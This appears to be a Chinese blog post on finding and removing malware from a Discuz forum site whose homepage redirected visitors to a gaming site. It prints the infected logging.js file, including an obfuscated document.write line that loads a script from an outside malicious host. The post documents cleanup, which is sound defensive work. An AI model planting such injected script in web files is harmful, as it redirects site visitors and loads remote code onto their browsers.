discuz网站被挂马 打开主页跳转至游戏网站

　　　最近，有一朋友的discuz系统网站被挂马了，一打开网站主页两秒钟之后就跳转到了游戏网站。这样的情况往往是在每天第一次打开网站的时候出现的，一天只有偶尔的一两次。朋友求我相助，经过一番周折，终于找到了挂马的地方。

　　刚开始，用discuz后台自带的“文件校验”功能去查找是否有修改的文件和未知文件，结果没有发现可疑目标。然后用了360网站安全检测和安全联盟安全检测进行查找扫描有无挂马情况，最后还是无功而返。无赖之下，只好进行逐一排查了，问题终于发现了，原来这次是在js文件里挂了马。

　　我先排查了iframe框架情况，结果没有发现情况。然后检查js文件，先检查主页里面的js文件，在检查logging.js这个文件时，问题发现了。

　　logging.js这个文件的路劲是/static/js/logging.js ，它本来是个登陆状态判断文件。我们先看看这段代码：

/*

[Discuz!] (C)2001-2099 Comsenz Inc.

This is NOT a freeware, use is subject to license terms

$Id: logging.js 23838 2011-08-11 06:51:58Z monkey $

*/

function lsSubmit(op) {

var op = !op ? 0 : op;

if(op) {

$('lsform').cookietime.value = 2592000;

}

if($('ls_username').value == '' || $('ls_password').value == '') {

showWindow('login', 'member.php?mod=logging&action=login' + (op ? '&cookietime=1' : ''));

} else {

ajaxpost('lsform', 'return_ls', 'return_ls');

}

return false;

}

document.write("<scr"+"ipt src="'http://q."+"n1512"

+"2"+".com"+"/s."+"asp"+"?gansu.lanzhou'>");

function errorhandle_ls(str, param) {

if(!param['type']) {

showError(str);

}

}

　　结果出现红色字体的多余代码，当机立断删除了这段代码。网站回复了正常！